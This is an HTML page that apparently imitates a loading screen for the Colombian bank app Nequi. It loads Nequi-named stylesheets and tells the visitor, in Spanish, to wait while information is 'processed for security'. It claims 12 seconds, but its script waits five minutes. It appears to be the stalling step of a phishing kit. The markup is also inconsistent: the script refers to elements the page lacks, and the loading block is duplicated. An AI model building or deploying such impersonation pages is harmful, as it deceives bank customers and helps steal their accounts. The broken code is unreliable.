<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Página de Ejemplo</title>
    <link rel="stylesheet" href="css/main.css">
    <link rel="stylesheet" href="css/nequi_one.webflow.css">
    <link rel="stylesheet" href="css/nequi_two.webflow.css">
    <link rel="stylesheet" href="css/normalize.css">



    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            overflow: hidden;
            font-family: Arial, sans-serif;
        }

        #loader {
            position: fixed;
            width: 100%;
            height: 100%;
            background-color: #f3f3f3;
            z-index: 9999;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
        }

        #loader img {
            width: 100px; /* Ajusta el tamaño de la imagen aquí */
            height: auto;
            margin-bottom: 20px;
        }

        #loader h1 {
            font-size: 2rem;
            margin: 0;
            color: #080707f3;
        }

        #loader p {
            font-size: 1rem;
            color: #666;
        }

        #content {
            display: none;
            padding: 20px;
        }
    </style>
</head>
<body>
  <div class="loading-container">
    <div class="loading">
        <img src="images/neq.png" alt="Imagen de carga" class="loading-image">
        <!-- Texto dentro del div de carga -->
        <div class="loading-text">Espera un momento por favor. Estamos procesando la información por tu seguridad...
        </div>
        <div class="loading-spinner" style="
    margin-bottom: 20px;
  "></div>

<div class="loading-container">
  <div class="loading">
      <img src="images/neq.png" alt="Imagen de carga" class="loading-image">
      <!-- Texto dentro del div de carga -->
      <div class="loading-text">Espera un momento por favor. Estamos procesando la información por tu seguridad...
      </div>
      <div class="loading-spinner" style="
  margin-bottom: 20px;
"></div>

  <span id="countdown">Tiempo estimado: 12 segundos</span>
  </div>
</div>

<script>
    window.addEventListener('load', function() {
        // Simula un tiempo de carga de 3 segundos
        setTimeout(function() {
            document.getElementById('loader').style.display = 'none';
            document.getElementById('content').style.display = 'block';
            document.body.style.overflow = 'auto'; // Permitir el desplazamiento después de la carga
        }, 300000);
    });
</script>

</body>
</html>
